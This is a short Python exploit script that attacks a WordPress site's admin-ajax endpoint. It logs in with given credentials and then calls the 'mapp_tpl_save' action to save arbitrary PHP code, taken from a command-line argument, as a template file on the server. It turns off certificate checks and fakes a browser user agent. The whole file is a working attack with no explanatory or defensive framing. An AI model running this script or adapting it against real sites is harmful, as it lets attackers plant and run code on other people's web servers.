import argparse
import requests
import os 
	
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('--url', required=True, help='URL of the WordPress site')
parser.add_argument('--username', required=True, help='Username')
parser.add_argument('--password', required=True, help='Password')
parser.add_argument('--code', help='Code to execute in the second curl command')
args = parser.parse_args()

session = requests.Session()
# Disable SSL verification
requests.packages.urllib3.disable_warnings()
session.verify = False  # Ignore SSL verification

user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

# Log in
login_url = args.url + '/wp-login.php'
response = session.post(login_url, verify=False, data={'log': args.username,'pwd': args.password,'rememberme': 'forever','wp-submit': 'Log+In'},headers={"User-Agent": user_agent})
# Confirm successful login
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
    print("Logged in successfully.")
else:
    print("Failed to log in.")
    exit()

# 2) Save executable PHP
ajax_url = f"{args.url}/wp-admin/admin-ajax.php"
response = session.post(ajax_url, data={'action': 'mapp_tpl_save','name': 'injectest2','content': args.code if args.code else "<?php echo 'upload successful';"}, verify=False,headers={"User-Agent": user_agent})

print(response.text)